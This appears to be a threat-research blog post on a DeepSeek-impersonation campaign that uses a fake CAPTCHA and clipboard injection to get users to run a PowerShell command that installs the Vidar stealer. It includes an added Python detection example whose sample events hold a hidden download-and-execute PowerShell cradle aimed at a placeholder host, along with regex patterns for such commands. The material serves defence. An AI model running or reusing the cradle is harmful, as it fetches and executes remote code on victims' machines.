Introduction

The rapid rise of generative AI tools has created opportunities and challenges for cybercriminals. In an instant, industries are being reshaped while new attack surfaces are being exposed. The DeepSeek AI chatbot, launched on January 20, 2025, quickly gained international attention, making it a prime target for abuse. Leveraging a tactic known as brand impersonation, threat actors craft fraudulent websites designed to impersonate DeepSeek and mislead unsuspecting users into divulging sensitive information and/or executing harmful malware. Zscaler ThreatLabz has highlighted concerns about open source generative AI tools, like DeepSeek, being misused by threat actors to enhance exploitation and data theft strategies.

This blog post delves into a DeepSeek-themed malware campaign that abuses the popularity of the name. Alongside brand impersonation, this attack chain demonstrates techniques including clipboard injection to deliver malicious PowerShell commands, the deployment of the Vidar information stealer, and the use of legitimate platforms like Telegram and Steam to conceal command-and-control (C2) communication. We also examine additional look-alike domains designed to lure users into interacting with malicious webpages.

Key Takeaways

- Cybercriminals are leveraging DeepSeek's popularity by creating websites hosted on fake look-alike domains to deceive users and deliver the Vidar information stealer.
- The malware campaign uses a fake CAPTCHA page to conduct clipboard injection, secretly copying a malicious PowerShell command for users to execute.
- It is crucial for organizations to have well-defined policies and security controls governing the use of generative AI models and applications in their environment, for both sanctioned and unsanctioned applications.

DeepSeek Look-Alike Domains

ThreatLabz has identified numerous domains leveraging the popularity of DeepSeek that imitate the official website and affiliated websites.
These fraudulent domains are used to facilitate a variety of malicious activities, including cryptocurrency pump-and-dump schemes, fake forums designed to steal user credentials, bogus gift card scams, and counterfeit gambling platforms. Below is a list of domains observed impersonating DeepSeek during our investigation.
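The clipboard-injection step noted in the key takeaways above ends with the victim pasting a PowerShell one-liner into the Windows Run dialog, which means the shell is spawned by explorer.exe rather than by a script or scheduler. As an added example that is not code from the original post, the following Python scores process-creation events for that pattern; the event shape, the command-line traits and the threshold are assumptions for this illustration, and every path and URL is a constructed placeholder, not an indicator from the campaign.

```python
import re

# Constructed process-creation events in the shape a Sysmon Event ID 1 or EDR
# feed might produce. Paths, commands and URLs are placeholders, not IoCs.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/a | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -NoProfile -EncodedCommand aQBlAHgA"},
    {"parent": r"C:\Program Files\Vendor\updater.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -File C:\\Scripts\\inventory.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmd": "notepad.exe"},
]

# Parents from which a user-pasted command starts: the Run dialog and the
# taskbar search both launch their children under the desktop shell.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Command-line traits typical of a pasted one-liner (assumed heuristics).
TRAITS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I),
    "bypass_policy": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "download_cradle": re.compile(
        r"(iwr|invoke-webrequest|irm|downloadstring)\b.*\b(iex|invoke-expression)\b", re.I),
}

def score_event(event):
    """Score one event; returns (score, list of matched trait names)."""
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image not in {"powershell.exe", "pwsh.exe"}:
        return 0, []
    hits = [name for name, rx in TRAITS.items() if rx.search(event["cmd"])]
    score = len(hits)
    if parent in INTERACTIVE_PARENTS:
        hits.append("interactive_parent")
        score += 2  # shell launched by the user's desktop, not by automation
    return score, hits

def flag_clickfix(events, threshold=3):
    """Return (index, score, hits) for events reaching the assumed threshold."""
    return [(i, s, h) for i, ev in enumerate(events)
            for s, h in [score_event(ev)] if s >= threshold]
```

Running `flag_clickfix(SAMPLE_EVENTS)` flags the two explorer-spawned shells and leaves the scheduled inventory script alone; in production the traits would be tuned against the environment's own baseline of interactive PowerShell use.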
[…]